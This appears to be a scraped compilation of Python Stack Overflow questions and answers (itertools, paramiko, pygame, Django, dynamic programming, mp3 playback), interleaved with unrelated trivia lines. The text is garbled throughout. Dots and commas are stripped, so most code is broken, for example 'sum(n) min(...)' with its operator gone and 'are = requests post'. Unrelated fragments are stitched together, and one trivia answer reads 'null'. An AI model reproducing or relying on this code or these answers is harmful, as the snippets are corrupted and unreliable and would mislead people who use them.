<pre class="lang-sql prettyprint-override">`UPDATE CorpData SET OperationID4Counter = (SELECT COUNT(*) FROM PlantData JOIN OperationData ON PlantName LIKE '%' || OperationName WHERE OperationData OperationID IN (SELECT OperationID FROM ServiceData WHERE ServiceID = 4) AND CorpID = CorpData CorpID) ````
Python: itertools for generating this combination? Is there an itertools function that will generate `x` as in this combination? ````for op1 in ['+' '-' '*']: for op2 in ['+' '-' '*']: for op3 in ['+' '-' '*']: for op4 in ['+' '-' '*']: x = [op1 op2 op3 op4] ````
You can use `itertools product`: ````&gt;&gt;&gt; from itertools import product &gt;&gt;&gt; list(product(['+' '-' '*'] repeat=4)) [('+' '+' '+' '+') ('+' '+' '+' '-') ('+' '+' '+' '*') ('+' '+' '-' '+') ('+' '+' '-' '-') ('+' '+' '-' '*') ('+' '+' '*' '+') ('+' '+' '*' '-') ('+' '+' '*' '*') ('+' '-' '+' '+') ('+' '-' '+' '-') ('+' '-' '+' '*') ('+' '-' '-' '+') ('+' '-' '-' '-') ('+' '-' '-' '*') ('+' '-' '*' '+') ('+' '-' '*' '-') ('+' '-' '*' '*') ('+' '*' '+' '+') ('+' '*' '+' '-') ('+' '*' '+' '*') ('+' '*' '-' '+') ('+' '*' '-' '-') ('+' '*' '-' '*') ('+' '*' '*' '+') ('+' '*' '*' '-') ('+' '*' '*' '*') ('-' '+' '+' '+') ('-' '+' '+' '-') ('-' '+' '+' '*') ('-' '+' '-' '+') ('-' '+' '-' '-') ('-' '+' '-' '*') ('-' '+' '*' '+') ('-' '+' '*' '-') ('-' '+' '*' '*') ('-' '-' '+' '+') ('-' '-' '+' '-') ('-' '-' '+' '*') ('-' '-' '-' '+') ('-' '-' '-' '-') ('-' '-' '-' '*') ('-' '-' '*' '+') ('-' '-' '*' '-') ('-' '-' '*' '*') ('-' '*' '+' '+') ('-' '*' '+' '-') ('-' '*' '+' '*') ('-' '*' '-' '+') ('-' '*' '-' '-') ('-' '*' '-' '*') ('-' '*' '*' '+') ('-' '*' '*' '-') ('-' '*' '*' '*') ('*' '+' '+' '+') ('*' '+' '+' '-') ('*' '+' '+' '*') ('*' '+' '-' '+') ('*' '+' '-' '-') ('*' '+' '-' '*') ('*' '+' '*' '+') ('*' '+' '*' '-') ('*' '+' '*' '*') ('*' '-' '+' '+') ('*' '-' '+' '-') ('*' '-' '+' '*') ('*' '-' '-' '+') ('*' '-' '-' '-') ('*' '-' '-' '*') ('*' '-' '*' '+') ('*' '-' '*' '-') ('*' '-' '*' '*') ('*' '*' '+' '+') ('*' '*' '+' '-') ('*' '*' '+' '*') ('*' '*' '-' '+') ('*' '*' '-' '-') ('*' '*' '-' '*') ('*' '*' '*' '+') ('*' '*' '*' '-') ('*' '*' '*' '*')] ````
How to run sudo with paramiko? (Python) What I have tried: - invoke_shell() then channel send su then send the password resulted in not being root - invoke_shell() then channel exec_command resulted in Channel Closed error - _transport open_session() then channel exec_command resulted in not being in root - invoke_shell() then write to the stdin and flush it resulted in not being in root
check this example out: ````ssh connect('127 0 0 1' username='jesse' password='lol') stdin stdout stderr = ssh exec_command( "sudo dmesg") stdin write('lol\n') stdin flush() data = stdout read splitlines() for line in data: if line split(':')[0] == 'AirPort': print line ```` Example found here with more explanations: <a href="http://jessenoller com/2009/02/05/ssh-programming-with-paramiko-completely-different/">http://jessenoller com/2009/02/05/ssh-programming-with-paramiko-completely-different/</a> Hope it helps!
What US president was critical of Egypt's repression of Muslim Brotherhood?
US president Barack Obama
How do I capture the output from a MoinMoin parser? Say I am writing a parser and want to include the output of another parser in the results I am returning If I do something like this: ````WikiParser = wikiutil importPlugin(self request cfg 'parser' 'text_moin_wiki' 'Parser') wp = WikiParser("some text" self request) wp format(self formatter) ```` then WikiParser will throw the results of its work straight into my self request object I would like to intercept that though - I would rather grab the results of the WikiParser work and manipulate them a bit more Is there a way for me to do this? How do I do it?
The Request object has a redirectedOutput function just for this purpose: ````parsed_formatted_string = self request redirectedOutput(wp format self formatter) ````
List comprehension for series of deltas How would you write a list comprehension in python to generate a series of `n-1` deltas between `n` items in an ordered list? Example: ````L = [5 9 2 1 7] RES = [5-9 9-2 2-1 1-7] = [4 7 1 6] # absolute values ````
The <a href="http://docs python org/library/itertools html#recipes" rel="nofollow">recipes</a> section of the <a href="http://docs python org/library/itertools html" rel="nofollow">itertools documentation</a> includes source code for a function called pairwise that you can use for this purpose: ````from itertools import * def pairwise(iterable): "s > (s0 s1) (s1 s2) (s2 s3) " a b = tee(iterable) b next() return izip(a b) ```` You can copy and paste this into your file With this function defined it is quite simple to do what you want: ````l = [5 9 2 1 7] print [abs(a-b) for a b in pairwise(l)] ```` Result ````[4 7 1 6] ````
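If you would rather not reach for itertools for a plain list, zipping the list against itself shifted by one gives the same pairs:

````
l = [5, 9, 2, 1, 7]
print [abs(a - b) for a, b in zip(l, l[1:])]
# [4, 7, 1, 6]
````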
Cannot make sprite invisible in pygame So I am making a basic pygame and I have several "barriers" and "portals" on the game map The former are spots that the player cannot touch and the latter are spots that change the level I am trying to make them invisible so just have an invisible rectangle on the map that the collision detection would notice but right now when I blit it to the map I have ugly black blobs I tried using dirty rectangles but that did not seem to work out so well My code (or at least the spots that handle the barriers and portals): ````class Barrier(pygame sprite DirtySprite): '''class that builds up the invisible barriers in the game''' #constructor function def __init__(self posX posY width height): #create a self variable to refer to the object #call up the parent's constructor pygame sprite DirtySprite __init__(self) self dirty = 1 self visible = 0 #Make the barrier self image = pygame Surface([width height]) #debug code that makes sure that the barrier is in the right place #self image fill(white) # place the top left corner of the barrier at the given location self rect = self image get_rect() self rect y = posY self rect x = posX barriers = pygame sprite Group() #global barrier list used in all maps portals = pygame sprite Group() #global portal list used in all maps class Portal(pygame sprite DirtySprite): '''class that builds up the portals in the game''' #constructor function def __init__(self posX posY width height): #create a self variable to refer to the object #call up the parent's constructor pygame sprite DirtySprite __init__(self) self dirty = 1 self visible = 0 #Make the barrier self image = pygame Surface([width height]) #debug code that makes sure that the barrier is in the right place self image fill(black) # place the top left corner of the barrier at the given location self rect = self image get_rect() self rect y = posY self rect x = posX def LoadInside(): barriers empty() portals empty() #Load up the level image whichLevel = 1 background_image = pygame image load("House png") convert() #a list of all the barriers in the room room_barrier_list = pygame sprite Group() #make a barrier out of all of the objects in the room barrierTopWall = Barrier(0 125 661 7) barrierLeftWall= Barrier(5 130 5 300) barrierBottomWallLeft= Barrier(10 414 292 7) barrierBottomWallRight= Barrier(364 412 298 7) barrierRightWall= Barrier(649 126 5 294) bed = Barrier(19 199 62 93) smallTableChairs = Barrier(273 220 97 39) pot = Barrier(300 288 34 31) table = Barrier(493 242 151 42) chair1 = Barrier(459 255 28 35) chair2 = Barrier(490 296 31 28) chair3 = Barrier(553 293 31 28) chair4 = Barrier(621 292 31 28) #make a portal to get out door = Portal(300 413 64 10) #add the barriers to the lists room_barrier_list add(barrierTopWall barrierLeftWall barrierBottomWallLeft barrierRightWall) barriers add(room_barrier_list) all_sprites_list add(barriers) room_barrier_list add(smallTableChairs pot table chair1 chair2 chair3 chair4 barrierBottomWallRight bed) barriers add(room_barrier_list) all_sprites_list add(barriers) #add the portal to the list all_sprites_list add(door) mainScreen blit(background_image [0 0]) # # The above code handles the room barriers and portals # while done==False: for event in pygame event get(): #user did something if event type == pygame QUIT: #if the user hit the close button done=True # Move the player if an arrow key is pressed key = pygame key get_pressed() if key[pygame K_LEFT]: faceWhatDirection = 'left' # set the faceWhatDirection variable player 
updateLeft() # call up the animation function player move(-10 0) if key[pygame K_RIGHT]: faceWhatDirection = 'right' # set the faceWhatDirection variable player updateRight() # call up the animation function player move(10 0) if key[pygame K_UP]: faceWhatDirection = 'up' # set the faceWhatDirection variable player updateUp() # call up the animation function player move(0 -10) if key[pygame K_DOWN]: faceWhatDirection = 'down' # set the faceWhatDirection variable player updateDown() # call up the animation function player move(0 10) #if the user presses the space bar the attack button if key[pygame K_SPACE]: bullet = Bullet() bullet_list append(bullet) #adds bullet to the bullet list all_sprites_list add(bullet) #adds the bullet to the sprite list to be drawn #puts the bullet in the same location as player (this needs to be changed to what direction player faces) bullet rect x = player rect x bullet rect y = player rect y 15 # the 15 places it at a location that is not on the player's face! bullet bulletDirection = faceWhatDirection #checks to see what direction to move the bullet in for bullet in bullet_list: bullet move_bullet() #see if the bullet hit anything barrier_hit_list = pygame sprite spritecollide(bullet barriers False) for barrier in barrier_hit_list: #remove the bullet if it hit something bullet_list remove(bullet) all_sprites_list remove(bullet) mainScreen fill(black)#makes the background white and thus the white part of the images will be invisible if whichLevel == 1: LoadInside() else: LoadOutside() #draw the sprites all_sprites_list draw(mainScreen) #limit the game to 20 fps clock tick(20) #update the screen on the regular pygame display flip() pygame quit() ````
It is quite easy the sprites are blitted by the Group draw() method ````all_sprites_list draw(mainScreen) ```` Do not add the barriers (or the portals) to the all_sprites_list Then they never get blitted on the screen but the `barrier_hit_list` can still be used for collision A tiny self-contained illustration follows below
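To make that concrete, here is a tiny runnable illustration; the Box class and the sizes are made up for the example, not taken from the question's code. The wall sits in a collision-only group that is never drawn.

````
import pygame

pygame.init()
screen = pygame.display.set_mode((200, 200))

class Box(pygame.sprite.Sprite):
    """A plain rectangular sprite used for both the player and the invisible wall."""
    def __init__(self, x, y, w, h):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.Surface([w, h])
        self.rect = self.image.get_rect(topleft=(x, y))

player = Box(10, 10, 20, 20)
wall = Box(0, 0, 200, 5)

drawn = pygame.sprite.Group(player)    # only things in here are ever blitted
barriers = pygame.sprite.Group(wall)   # collision-only group, never drawn

screen.fill((0, 0, 0))
drawn.draw(screen)                     # the wall stays invisible
hits = pygame.sprite.spritecollide(player, barriers, False)
print(hits)                            # empty here, but barriers still work for collisions
pygame.display.flip()
pygame.quit()
````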
Creating GUI with Python in Linux Quick question I am using Linux and I want to try making a GUI with Python I have heard about something like Qt GTK+ and PyGTK but I do not know what they are exactly and what the difference between them is Is there any difference on how they work with different DEs like GNOME KDE XFCE etc ? Is there any IDE that allows you to create GUI like Microsoft Visual Studio does (for C# C Visual Basic etc )? Or should I maybe use another language other than Python to make GUI applications?
Your first step should be <a href="http://wiki python org/moin/GuiProgramming" rel="nofollow">http://wiki python org/moin/GuiProgramming</a> Some tool-kits integrate better in one environment than in the other For example PyQt PyKDE (and the brand new <a href="http://www pyside org/" rel="nofollow">PySide</a>) will play nicer in a KDE environment while the GTK versions (including the WX-widgets) will blend better into GNOME/XFCE desktops You should look at the environment you want to target You can go for a basic portable GUI kit or you can go for deeper integration with your DE such as using the integrated password manager and configuration file parsers of a specific DE like KDE or GNOME You should also consider the dependencies that your selection dictates and what comes by default with a basic DE For example PyKDE in the KDE 3 X branch had a non-trivial set of dependencies while in the 4 X branch the plasma bindings made the Python GUI programming dependency less of an issue There are several IDE tools at different levels of completeness and maturity The best thing is to try one or more and see what best fits your needs
How best to store large sequences of text in Python? I recently discovered that a student of mine was doing an independent project in which he was using <them>very</them> large strings (2-4MB) as values in a dictionary I have never had a reason to work with such large blocks of text and it got me wondering if there were performance issues associated with creating such large strings Is there a better way of doing it than to simply create a string? I realize this question is largely context dependent but I am looking for generalized answers that may cover more than one possible use-case If you were working with that much text how would you store it in your code and would you do anything different than if you were simply working with an ordinary string of only a few characters?
It depends a lot on what you are doing with the strings I am not exactly sure how Python stores strings but I have done a lot of work on XEmacs (similar to GNU Emacs) and on the underlying implementation of Emacs Lisp which is a dynamic language like Python and I know how strings are implemented there Strings are going to be stored as blocks of memory similar to arrays There is not a huge issue creating large arrays in Python so I do not think simply storing the strings this way will cause performance issues Some things to consider though: - How are you building up the string? If you build up piece-by-piece by simply appending to ever larger strings you have an O(N^2) algorithm that will be very slow Java handles this with a `StringBuilder` class I am not sure if there is an exact equivalent in Python but you can simply create an array with all the parts you want to join together then join at the end using `'' join(array)` - Do you need to search the string? This is not related to creating the strings but it is something to consider Searching will in general be O(n) in the size of the string; there are speedups that make it O(n/m) where m is the size of the substring you are searching for but that is about it The main consideration here is whether to store one big string or a series of substrings If you need to search all the substrings that will not help much over searching a big string but it is possible you might know in advance that some parts do not need to be searched - Do you need to access substrings? Again this is not related to creating the strings it is something to consider Accessing a substring by position is just a matter of indexing to the right memory location but if you need to take large substrings it may be inefficient and you might be able to speed things up by storing your string as an array of substrings and then creating a new string as another array with some of the strings shared However doing it this way takes work and should not be done unless it is really necessary In sum I think for simple cases it is fine to have large strings like this but you should think about the sorts of operations you are going to perform and what their O( ) time is
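A small illustration of the join point above — collecting the pieces in a list and joining once at the end keeps the build O(N) instead of the O(N^2) repeated-concatenation pattern:

````
pieces = []
for i in range(100000):
    pieces.append('chunk %d ' % i)   # list append is amortized O(1)
text = ''.join(pieces)               # a single O(N) concatenation at the end
print(len(text))
````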
PyCharm not respond to my change in JavaScript file I am developing a simple web application integrated with MySQL database I am using PyCharm to write Python HTML JavaScript CSS After I make change to my JavaScript and I run my application on Chrome the Chrome console suggests that the change did not apply I already invalid PyCharm caches and restart Pycharm it still cannot work Anyone has idea about this? PS: if I rename the JavaScript file it will work But what is the reason of this problem? And how can I solve it without renaming? Thanks in advance!
Open the Chrome Developer Tools settings and tick "Disable cache (while DevTools is open)" so the stale JavaScript file is no longer served from the browser cache credit to @All is Vanity
How to create continuously changing variables in Python In pseudocode you can create variables such as 'variable(x)' having x as a forever changing number therefore creating multiple different variables For example if: ````x = 0 variable(x) = 4 x = 1 variable(x) = 7 ```` then printing 'variable(0)' would give you the result '4' and printing 'variable(1)' would output '7' My question is: is this possible to do in Python?
You cannot use exactly that syntax in Python but you can come close using a <a href="https://docs python org/2/library/stdtypes html#mapping-types-dict" rel="nofollow">`dict`</a> ````variable = {} x = 0 variable[x] = 4 x = 1 variable[x] = 7 print(variable[0]) print(variable[1]) ```` If the domain of your variable is non-negative integers and you know the largest integer <them>a priori</them> then you could use a <a href="https://docs python org/2/library/stdtypes html#sequence-types-str-unicode-list-tuple-bytearray-buffer-xrange" rel="nofollow">`list`</a>: ````variable = [None]*2 x = 0 variable[x] = 4 x = 1 variable[x] = 7 print(variable[0]) print(variable[1]) ````
Python - How to make a background response timeout function I have made a <a href="http://en wikipedia org/wiki/Farkle" rel="nofollow">Farkle</a> Jabber game bot using Python SleekXMPP library In multiplayer mode a user plays against a user by turns I am trying to make a timeout duration so that if your opponent did not respond in 1 minute for example you win Here is what I have tried: ````import sleekxmpp time_received={} class FarkleBot(sleekxmpp ClientXMPP): def timeout(self message opp): while True: if time time() - time_received[opp] &gt;= 60: print "Timeout!" #stuff break def messages(self message): global time_received time_received[user] = time time() if message['body'] split()[0] == 'duel': opp=message['body'] split()[1] #the opponent #do stuff and send "Let us duel!" to the opponent checktime=threading Thread(target=self timeout(self message opp)) checktime start() ```` The problem with the code above is that it will freeze the whole class until the 1 minute passes How can I avoid that? I tried putting the `timeout` funcion outside the class but nothing's changed
If you must wait for something it is best to use time sleep() instead of busy waiting You could rewrite your timeout like this: ````def timeout(self message opp turn): time sleep(60) if not turn_is_already_done: print "Timeout" ```` As you see you must somehow keep track of whether a move has been received on time Therefore an easier solution might be to set an alarm using `threading Timer` You must then set a handler to handle the timeout and remember that the timer only fires after it has been started E g ````def messages(self message): timer = threading Timer(60 self handle_timeout) timer start() # the alarm is armed only after start() # do other stuff # if a move is received in time you can cancel the alarm using: timer cancel() def handle_timeout(self): print "you lose" ````
Disease can arise when an organism inflicts what on the host?
damage
What act gave New Zealand its independence in 1961?
null
What is one regional UN office located in New Delhi?
UNDP
Uploading a file to Python bottle server without HTML form Currently I have an HTML form which chooses the file and upload it to server How to do it without HTML form ````<html&gt; <head&gt;</head&gt; <body&gt; <form action="/upload" method="post" enctype="multipart/form-data"&gt; Select a file: <input type="file" name="uploadinc" /&gt; <input type="submit" value="Start upload" /&gt; </form&gt; </body&gt; </html&gt; ```` And my bottle server contains the following code to upload ````@route('/UploadFiles' method='POST') def UploadFiles(): print "inside upload files" uploadinc = request files get('uploadinc') uploadinc save("/home/user/files/"+uploadinc filename) ```` I want to directly save the file without HTML UI Like ```` request files get("file location in local machine if it is fixed(C:\\a txt)") ```` But it is getting as none How to do it? I am able to call the Rest API from a rest client like this <a href="http://i stack imgur com/wnuE0 jpg" rel="nofollow"><img src="http://i stack imgur com/wnuE0 jpg" alt="Calling REST api with multipart form data"></a> How to do this call programatically ?
You may try <a href="http://www python-requests org/en/latest/" rel="nofollow">Requests</a> lib: <a href="http://www python-requests org/en/latest/user/quickstart/#post-a-multipart-encoded-file" rel="nofollow">POST a Multipart-Encoded File</a> <blockquote> How to do this call programatically ? </blockquote> Modified example from Requests lib <a href="http://www python-requests org/en/latest/user/advanced/#post-multiple-multipart-encoded-files" rel="nofollow">documentation</a>: ````import requests url = 'http://10 208 53 89:7778/UploadFiles' multiple_files = [ ('images' ('foo png' open('foo png' 'rb') 'image/png')) ('images' ('bar png' open('bar png' 'rb') 'image/png')) ] are = requests post(url files=multiple_files) ````
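For the single uploadinc field from the question's form a minimal sketch might look like this; the URL, port and filename are placeholders, use whatever your bottle app actually listens on.

````
import requests

url = 'http://localhost:8080/UploadFiles'        # placeholder host/port for the bottle app
with open('C:\\a.txt', 'rb') as f:               # the local file you want to send
    resp = requests.post(url, files={'uploadinc': ('a.txt', f)})

print(resp.status_code)
print(resp.text)
````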
Python: Recursion: Passing some value down through the calls Look at this snippet: ````def recur(n): ds = {} x=do_foo(n) if foo(n): ds[n] = recur(x) else: return x ```` what i want to ask is ds at first iteration is empty and then it adds on some condition if true if it recurs on second iteration it enters at `ds[n] = recur(x)` so in this nth iteration ds is again defined as ds = {} OR ds retains its previous elements If it does not then how to retain the elements?
It is very hard to tell what you want here as the code you posted is not valid Python but I think you are asking how to pass some sort of cache down through the calls The way to do this is to make the cache an optional parameter That way you can call your function without a cache or you can pass it through to the recursive calls ````def recur(n ds=None): if ds is None: ds = {} x=do_foo(n) if foo(n): ds[n] = recur(x ds) else: return x ```` Alternatively use a class which gives you full control over how long the cache will persist: ````class Bar(object): def __init__(self): self ds = {} def recur(self n): x=do_foo(n) if foo(n): self ds[n] = self recur(x) else: return x ````
Finding range of a numpy array elements This is a very simple question: I have a numpy array of 94 x 155: ````a = [1 2 20 68 210 290 2 33 34 55 230 340 ] ```` I want to calculate the range of each row so that I get 94 ranges in a result I tried looking for numpy range function which I do not think exists If this can be done through a loop then its also good For example: Like we have numpy mean() function in which if we set the axis parameter as 1 then it returns the mean for each row in the Nd array
I think `np ptp` might do what you want: <a href="http://docs scipy org/doc/numpy/reference/generated/numpy ptp html">http://docs scipy org/doc/numpy/reference/generated/numpy ptp html</a> ````r = np ptp(a axis=1) ```` where `r` is your range array
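The same thing spelled out with max and min, if you prefer being explicit about what the range is:

````
import numpy as np

a = np.random.rand(94, 155)
row_range = a.max(axis=1) - a.min(axis=1)   # identical to np.ptp(a, axis=1)
print(row_range.shape)                      # (94,)
````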
Green-threads and thread in python As <a href="http://en wikipedia org/wiki/Green_threads"><strong>Wikipedia States</strong></a>: <blockquote> Green threads emulate multi-threaded environments without relying on any native OS capabilities and they are managed in user space instead of kernel space enabling them to work in environments that do not have native thread support </blockquote> Python's threads are implemented as `pthreads (kernel threads)` and because of the Global Interpreter Lock (`GIL`) a python process only runs one thread at a time [<strong>QUESTION</strong>] But in the case of `Green-threads` (or so-called greenlet or tasklets) <blockquote> - Does the `GIL` affect them? Can there be more than one greenlet running at a time? - What are the pitfalls of using greenlets or tasklets? - If I use greenlets how many of them can a process can handle? (I am wondering because in a single process you can open threads up to <them>ulimit</them>(<them>-s</them> <them>-v</them>) set in your *ix system ) </blockquote> I need a little insight It would help if someone could share their experience or guide me to right path
I assume you are talking about eventlet/gevent greenlets 1) There can be only one greenlet running at a time (so the GIL is not what limits them since nothing runs in parallel anyway) 2) It is cooperative multithreading which means that if a greenlet is stuck in an infinite loop your entire program is stuck; typically greenlets are scheduled either explicitly or during I/O 3) A lot more than threads since a greenlet is much lighter than an OS thread it mostly depends on the amount of RAM available
Find longest repetitive sequence in a string I need to find the longest sequence in a string with the caveat that the sequence must be repeated three or more times So for example if my string is: <strong>fdwaw4helloworldvcdv1c3xcv3xcz1sda21f2sd1ahelloworldgafgfa4564534321fadghelloworld</strong> then I would like the value "<strong>helloworld</strong>" to be returned I know of a few ways of accomplishing this but the problem I am facing is that the actual string is absurdly large so I am really looking for a method that can do it in a timely fashion
This problem is a variant of the <a href="http://en wikipedia org/wiki/Longest_repeated_substring_problem">longest repeated substring problem</a> and there is an O(n)-time algorithm for solving it that uses <a href="http://en wikipedia org/wiki/Suffix_tree">suffix trees</a> The idea (as suggested by Wikipedia) is to construct a suffix tree (time O(n)) annotate all the nodes in the tree with the number of descendants (time O(n) using a DFS) and then to find the deepest node in the tree with at least three descendants (time O(n) using a DFS) This overall algorithm takes time O(n) That said suffix trees are notoriously hard to construct so you would probably want to find a Python library that implements suffix trees for you before attempting this implementation A quick Google search turns up <a href="https://github com/kvh/Python-Suffix-Tree">this library</a> though I am not sure whether this is a good implementation Hope this helps!
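If pulling in a suffix-tree library turns out to be more than you need, here is a much simpler sketch of my own, not the O(n) algorithm above: binary-search the answer length and count substring occurrences with a Counter. It is roughly O(n^2 log n) worst case and memory-hungry, so it is only reasonable for moderately sized strings, but it is easy to verify.

````
from collections import Counter

def repeated_substring(s, length, times=3):
    """Return some substring of `length` occurring at least `times` times, else None."""
    counts = Counter(s[i:i + length] for i in range(len(s) - length + 1))
    for sub, n in counts.items():
        if n >= times:
            return sub
    return None

def longest_repeated(s, times=3):
    # if a string of length L occurs >= times, so does its length L-1 prefix,
    # which makes the predicate monotone and binary search valid
    lo, hi, best = 1, len(s), ''
    while lo <= hi:
        mid = (lo + hi) // 2
        found = repeated_substring(s, mid, times)
        if found is not None:
            best, lo = found, mid + 1
        else:
            hi = mid - 1
    return best

s = "fdwaw4helloworldvcdv1c3xcv3xcz1sda21f2sd1ahelloworldgafgfa4564534321fadghelloworld"
print(longest_repeated(s))   # helloworld
````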
How to make an interactive list with python tkinter? Well I want to make a program that takes a set of variables from a database and shows them in a list I was thinking about using the Listbox widget but when I tried it before it did not show itself as really interactive What I am going for is a list that when an item is double-clicked will show some more information about said item in a window Also I want it to be organized so that it shows when still in the list the items informations in their boxes and not in a single string as in the Listbox widget As it is probably obvious by now I am a beginner with tkinter so this would help me a lot
Have a look at <a href="http://code metager de/source/xref/jython/CPythonLib/idlelib/ScrolledList py" rel="nofollow">idlelib ScrolledList</a> ````110 # Methods to override for specific actions 111 112 def fill_menu(self): 113 pass 114 115 def on_select(self index): 116 pass 117 118 def on_double(self index): 119 pass ```` You can subclass it or you just put your methods into the created object Are these the methods you need?
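If a plain Listbox ends up being enough, the double-click part of the question is just an event binding — a minimal sketch; the items dict is a stand-in for your database rows and the module names are the Python 2 ones.

````
import Tkinter as tk          # `import tkinter as tk` on Python 3
import tkMessageBox           # `from tkinter import messagebox` on Python 3

items = {'apple': 'A red fruit', 'banana': 'A yellow fruit'}   # stand-in for DB rows

root = tk.Tk()
listbox = tk.Listbox(root)
listbox.pack(fill='both', expand=True)
for name in items:
    listbox.insert('end', name)

def show_details(event):
    selection = listbox.curselection()
    if selection:
        name = listbox.get(selection[0])
        tkMessageBox.showinfo(name, items[name])   # popup with more information

listbox.bind('<Double-Button-1>', show_details)    # double-click opens the detail window
root.mainloop()
````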
Dynamic programming does not give correct answer I recently found out about the technique called dynamic programming and I stumbled upon a problem which I cannot figure out You are given a list of arguments in the beginning and you need to do sums on as if you were cutting it If the list has only one element you do not sum it If it has more you sum the elements and cut it in every possible way So if list has n elements there are just n-1 ways to cut it The picture will explain: <a href="http://i stack imgur com/uZhbB png" rel="nofollow"><img src="http://i stack imgur com/uZhbB png" alt="Opt"></a> I first wanted to sum up all of the sumable parts and I expected the result 20( 11 9 ) ( even thought the correct answer is 9 ) but I thought it would be a good start But my code returns number 37 and I have no idea why What am I doing wrong? ````summ = 0 def Opt( n ): global summ if len( n ) == 1: return 0 else: summ = sum( n ) for i in range( 1 len( n ) ): summ = Opt( n[ :i ] ) Opt( n[ i: ] ) return summ print( Opt( [ 1 2 3 ] ) ) ```` Thank you for your time and any answer!
I think this is what you want: ````def Opt(n): if len(n) == 1: return 0 else: return sum(n) min(Opt(n[:i]) Opt(n[i:]) for i in range(1 len(n))) ```` Example: ````&gt;&gt;&gt; Opt([1]) 0 &gt;&gt;&gt; Opt([1 2]) 3 &gt;&gt;&gt; Opt([2 3]) 5 &gt;&gt;&gt; Opt([1 2 3]) 9 &gt;&gt;&gt; Opt([1 2 3 4]) 19 ```` Dynamic programming is about dividing the "big problem" into small subproblems So first of all you should identify how the big problem is related to the subproblems You do this by writing a recurrence relation In this case: ````Opt(nums) = sum(nums) min( ) ```` You also need a starting point: ````Opt(nums) = 0 iff len(nums) == 1 ```` As you can see once you have wrote the recurrence relation transforming it into Python code is often straightforward It is important to understand that each subproblem is self-contained and should not need external input Your use of `global` variables was not only producing the wrong result but was against the spirit of dynamic programming Your use of trees for expressing `Opt()` is nice What you forgot to do is writing the relationship between each node and its children If you did I am almost sure that you would have found the correct solution yourself We are not finished yet (thanks <a href="http://stackoverflow com/users/1672429/stefan-pochmann">Stefan Pochmann</a> for noticing) In order to build a true dynamic programming solution you also need to avoid solving the same problem more than once Currently running `Opt([1 2 3 4])` results in calling `Opt([1 2])` more than once One way to prevent that is by using memoization: ````cache = {} def Opt(n): # tuple objects are hashable and can be put in the cache n = tuple(n) if n in cache: return cache[n] if len(n) == 1: result = 0 else: result = sum(n) min(Opt(n[:i]) Opt(n[i:]) for i in range(1 len(n))) cache[n] = result return result ```` By the way remember to handle the case where `n` is empty (i e `len(n) == 0`)
Django Rest Framework: set database dynamically from URL parameter I am trying to find the right way to do this: Users service: ````/api/<country&gt;/users /api/us/users ```` That service should use the database corresponding to the country in the URL settings py: ````DATABASES = { 'default': {} 'us': { 'ENGINE': 'django db backends postgresql_psycopg2' 'NAME': 'XXX_US' 'USER': 'US' 'PASSWORD': 'XXX' 'HOST': 'localhost' 'PORT': '5432' } 'es': { 'ENGINE': 'django db backends postgresql_psycopg2' 'NAME': 'XXX_ES' 'USER': 'ES' 'PASSWORD': 'XXX' 'HOST': 'localhost' 'PORT': '5432' } } ```` To set the database in the ModelViewSet I to this: ````class UserViewSet(viewsets ModelViewSet): model = User serializer_class = UserSerializer def get_queryset(self): country = self kwargs['country'] return User objects using(country) all() ```` The problem appears when I try to do a POST or PUT Do I have to overwrite the create() or save() method of the serializer? Is there any other way to do this? Thank you very much!
I think the best place for such functionality is a `QuerySet` or a <a href="https://docs djangoproject com/en/1 9/topics/db/managers/" rel="nofollow">ModelManager</a> For example the DRF's default serializer uses <a href="https://github com/tomchristie/django-rest-framework/blob/master/rest_framework/serializers py#L846" rel="nofollow">the default model's manager</a> for creating objects Unfortunately the `QuerySet` does not have a way to easily change the current database (`self db`) depending on the models' fields so you will have to override all the relevant methods ````class UserQuerySet(models QuerySet): def create(self **kwargs): obj = self model(**kwargs) self _for_write = True obj save(force_insert=True using=kwargs get('country')) return obj class User(models Model): objects = UserQuerySet as_manager() ````
Appending item to dictionary from another dictionary I am trying to move a value from one dictionary to another based on the value of each key here is the code: ````dict = {'a':1 'b':2 'c':0 'd':0 'e':0} dict2 = {} for c in dict: if dict values() &gt; 1: dict2 update(c) ```` I am being given the error: ````TypeError: unorderable types: dict_values() &gt; int() ```` Any ideas? Thanks
The problem here is `dict values()` returns an iterable and you cannot compare that to an int Instead iterate over the dictionary and compare the value of each item to a number If it fits your criteria you set the key/value pair in the new dictionary ````dict = {'a':1 'b':2 'c':0 'd':0 'e':0} dict2 = {} for key value in dict iteritems(): #use items() if you use Python 3 if value &gt; 1: dict2[key]= value ```` `dict iteritems()` (use `dict items()` for Python3) will return an iterable of (key value) pairs `dict[key] = value` will add the `value` to the dictionary with the given `key` Also `dict` means something in Python by default <a href="https://docs python org/2/library/stdtypes html#dict" rel="nofollow">(it is a class)</a> so it is not a good idea to use it as a variable name Unlike some languages it will let you use it as a variable name but it will prevent you from calling the dict class A one-line version is shown below
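The same filtering written as a single dict comprehension (works on Python 2.7 and 3):

````
d = {'a': 1, 'b': 2, 'c': 0, 'd': 0, 'e': 0}
d2 = {key: value for key, value in d.items() if value > 1}
print(d2)   # {'b': 2}
````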
Why does a single value work as a condition Obviously in conditional statements you need to make sure a true or false value is returned to either execute or skip the block of code associated with the if statement How does a single value serve as a true Boolean in python? I am not sure if this is a universal for all languages but I have discovered it in python 3 x Example: ````value = 1 if value: print("value == True") # prints every time ```` I would expect the compiler to complain or just return false Why does the compiler perceive `if value` as true?
Integer or float values other than 0 are treated as True: ````In [8]: bool(int(1)) Out[8]: True In [9]: bool(int(0)) Out[9]: False In [10]: bool(int(-1)) Out[10]: True In [16]: bool(float(1 2e4)) Out[16]: True In [17]: bool(float(-1 4)) Out[17]: True In [20]: bool(0 0) Out[20]: False In [21]: bool(0 000001) Out[21]: True ```` Similarly empty lists sets dicts empty string None etc are treated as False: ````In [11]: bool([]) Out[11]: False In [12]: bool({}) Out[12]: False In [13]: bool(set()) Out[13]: False In [14]: bool("") Out[14]: False In [19]: bool(None) Out[19]: False ````
Finding the length of an mp3 file So i have the code: ````import glob os import random path = 'C:\\Music\\' aw=[] for infile in glob glob( os path join(path '* mp3') ): libr = infile split('Downloaded' 1) aw append(infile) aww = -1 while 1: aww = 1 print len(aw) aww random shuffle(aw) awww = aw[aww] os startfile(awww) ```` but all it does is go through all of the songs without stopping I thought if I could find the length of the song that is currently playing I could use the "time" module to keep going after the song is done with the (sleep) attribute However I could not find how to get the length of the song on windows Does anyone know a solution to my probleme?
